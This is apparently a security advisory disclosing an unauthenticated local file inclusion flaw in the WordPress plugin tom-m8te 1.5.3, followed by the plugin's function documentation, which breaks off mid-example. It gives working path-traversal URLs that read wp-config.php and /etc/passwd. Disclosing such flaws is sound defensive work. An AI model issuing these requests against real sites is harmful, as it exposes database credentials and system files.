wp-plugin : tom-m8te – Local File Inclusion

 

Plugin Details

 

Plugin Name : tom-m8te

 

Effected Version : 1.5.3 (and most probably lower version's if any)

 
Vulnerability : Local File Inclusion
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

1) http://localhost/wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../wp-config.php
2) http://localhost/wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd

Vulnerable parameter : file

tom-m8te LFI

 

Disclosure Timeline

 

Vendor Contacted : 2014-02-19

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Tom M8te provides useful functions that you can use in your plugins. Such as a nice function for adding social share links and database manipulation functions.

The social links link to Facebook and Twitter share links.

Facebook: https://www.facebook.com/sharer/sharer.php?u=

Twitter:  http://twitter.com/intent/tweet?url=


Functions:

------------------------------------------------

tom_get_month_list()

Returns an array of months of the year.

(((((((((((((((((((((((

tom_add_social_share_links($url)

$url = (string) The url of a site you wish for your users to share.

Creates a share website link for Facebook and Twitter.

(((((((((((((((((((((((

tom_write_to_file($write_content, $location)

$write_content = (string) Content to save to file.

$location = (string) The physical file location of the file to save the content to.

Save content to a file.

(((((((((((((((((((((((

tom_write_to_htaccess_file($rule_name, $content)

$rule_name = (string) WP ERROR LOG

$content = (string) The htaccess content to add. Example: norder allow,denyndeny from allnnphp_flag  log_errors onnphp_value error_log error_log

Write content to the htaccess file.

(((((((((((((((((((((((

tom_is_file_writable($file)

$file = (string) Path to file to test.

Returns true if the file is writable, false if it isn't.

(((((((((((((((((((((((

tom_is_file_readable($file)

$file = (string) Path to file to test.

Returns true if the file is readable, false if it isn't.

(((((((((((((((((((((((

tom_javascript_redirect_to($url, $non_javscript_content = "")

$url = (string) The url to direct the page to.

$non_javscript_content = (string)(optional) Textual content for those who do not have javascript enabled.

Redirects the page to a particular url using javascript. Sometimes this is easier then using php redirect, because of the headers sent issue.

(((((((((((((((((((((((

tom_titlize_str($str)

$str = (string) The string you wish to titlize.

Titlizes a string. For example: status_level would become Status Level.

(((((((((((((((((((((((

tom_is_valid_datetime($datetime)

$datetime = (string) The string to test for datetime.

Checks to see if the parameter is a datetime. Returns true if its a date or datetime, False if its not.

(((((((((((((((((((((((

tom_is_valid_email($email)

$email = (string) The string to test for email.

Checks to see if the parameter is an email. Returns true if its a email, False if its not.

(((((((((((((((((((((((

tom_is_valid_emails($emails)

$email = (string) The string to test for emails, separated by commas. Example: test@test.com.au,joke@hotmail.com

Returns true if the parameter contains a list of emails separated by commas.

(((((((((((((((((((((((

tom_get_query_string_value($name, $index)

$name = (string) The name of the query string value, It can be the name of $_POST or $_GET, but $_POST takes precidence.

$index = (integer)(optional) Default = -1. Index number of the query string array item.

Basically gets the value from query string without having to use $_POST or $_GET variables. $_POST takes precidence over $_GET.

(((((((((((((((((((((((

tom_fix_http_quotes($http_data)

$http_data = (string) The post/get data.

Fixes up http post/get variables so that they present quotes correctly rather then like (').

(((((((((((((((((((((((

tom_upload_file($field_name)

$field_name = (string) The name of file input field.

Allows you to upload a file.

(((((((((((((((((((((((

tom_send_email($is_html, $to_emails, $to_cc_emails, $to_bcc_emails, $from_email, $from_name, $subject, $body, $alt_body = "", $attachments = array(), $smtp_auth = false, $smtp_mail_host = "", $smtp_mail_port = "", $smtp_mail_username = "", $smtp_mail_password = "", $secure_array = array())

$is_html = (boolean) True if you want to send HTML emails, False if you just want to send text emails.

$to_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$to_cc_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$to_bcc_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$from_email = (string) The email address of the sender.

$from_name = (string) The name of the sender.

$subject = (string) The subject of the email.

$body = (string) The actual email.

$alt_body = (string) Content that appears if HTML is not supported.

$attachments = (array)(optional) Array of attachments. Example array("img/logo.png", "img/attachment.jpg").

$smtp_auth = (boolean)(optional) Use smtp authentication and use your smtp server instead of built in PHP.

$smtp_mail_host = (string)(optional) Mail host. Example: mail.domain.com.au.

$smtp_mail_port = (string)(optional) Your smtp port. Usually 25.

$smtp_mail_username = (string)(optional) Your smtp username.

$smtp_mail_password = (string)(optional) Your smtp password.

$secure_array = (Array)(optional) Array of security algorithms used by your SMTP server. Example array("tls"), array("ssl") or array("tls", "ssl"). "tls" and "ssl" are the only two values acceptable for this parameter.

Allows you to send an email. Returns a success or error messages.

(((((((((((((((((((((((

tom_generate_datatable($table_name, $fields_array, $primary_key_name, $where_clause, $order_array = array(), $limit_clause = "", $page_name, $display_show = true, $display_edit = true, $display_delete = true)

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$fields_array = (array) An array of field names will be selected as part of the sql query. For example: array("id", "name", "address").

$primary_key_name = (string) Name of primary key field. Needs to be in the $fields_array.

$where_clause = (string)(optional) The SQL Where clause without the keyword WHERE.

$order_array = (array)(optional) An array of fields you wish to order the records by with order direction. For example: array("id DESC", "name ASC"). If null, there will be no order.

$limit_clause = (integer)(optional) The number of records to limit by. If null, there is no limit and will select all records based on $where_array.

$page_name = (string)(optional) The name of the page you want the show,edit,delete,pagination links to link to. Example: get_option("siteurl")."/wp-admin/admin.php?page=ventura-feedback-form/ventura-feedback-form.php"

$display_show = (boolean)(optional) Make show links visible. Default is true, It appends &action=show&id={{record_id}} to the link.

$display_edit = (boolean)(optional) Make show links visible. Default is true, It appends &action=edit&id={{record_id}} to the link.

$display_delete = (boolean)(optional) Make show links visible. Default is true, It appends &action=delete&id={{record_id}} to the link.

$sortable_columns = (boolean)(optional) Make columns sortable. Default is false.

$paginate_table = (boolean)(optional) Add pagination to the table. Default is false. The number of records per page is controlled by $limit_clause.

$date_format = (string)(optional) You can change the format of your dates. Default is Y-m-d.

$filter_array = (array)(optional) You can set up a filter system. Default is no filter. For example: array(array("status" => array("type" => "select", "value_options" => array("" => "", "Draft" => "Draft", "Published" => "Published"))),array("suburb" => array("type" => "text"))). Type can be text, select, radio, etc and option_values is only applicable to select, radio and checkbox.

(((((((((((((((((((((((

tom_generate_displayview($table_name, $fields_array, $id_column_name, $id)

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$fields_array = (array) An array of field names will be selected as part of the sql query. For example: array("id", "name", "address").

$id_column_name = (string) Name of primary key field. Needs to be in the $fields_array.

$id = (integer) The id value of the record you wish to display.

Generates a definition list with data from a record in the database.

(((((((((((((((((((((((

tom_compress_content($content)

$content = (string) The content you wish to compress.

Returns compressed version of $content.

(((((((((((((((((((((((

tom_get_form_query_strings($table_name, $exclude_fields = array(), $include_field_values = array()

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$exclude_fields = (array)(optional) Array of field names to exclude in query string. For example: array("confirm_date", "active").

$exclude_fields = (array)(optional) Array of query string values to include. For example: array("updated_at" => $current_datetime, "created_at" => $current_datetime).

Returns array of query strings from a form. Works out the $_POST and $_GET array names from the database table column names.

Example:

tom_update_record_by_id("ventura_feedback_forms",
                tom_get_form_query_strings("ventura_feedback_forms", array("created_at", "updated_at"), array("updated_at" => gmdate( 'Y-m-d H:i:s'))), "ID", $_POST["ID"]);

(((((((((((((((((((((((

tom_validate_form($validations_array)

$validation_array = (array) Array of validation. Example: array("project_number" => "required", "completion_date" => "required date", "rating" => "integer"). The key is the field name and the value is the type of validation. Current the method can only accept required, integer and date validation.

Returns true if the form submitted is valid, false if not. When a form field is invalid, it adds an error message to your tom_add_form_field method.

Example:

$array_validation_rules = array("project_number" => "required", "completion_date" => "required date", "rating" => "integer", "start_price" => "currency");

if (isset($_POST["action"])) {

  if ($_POST["action"]

Leave a Reply

Your email address will not be published. Required fields are marked *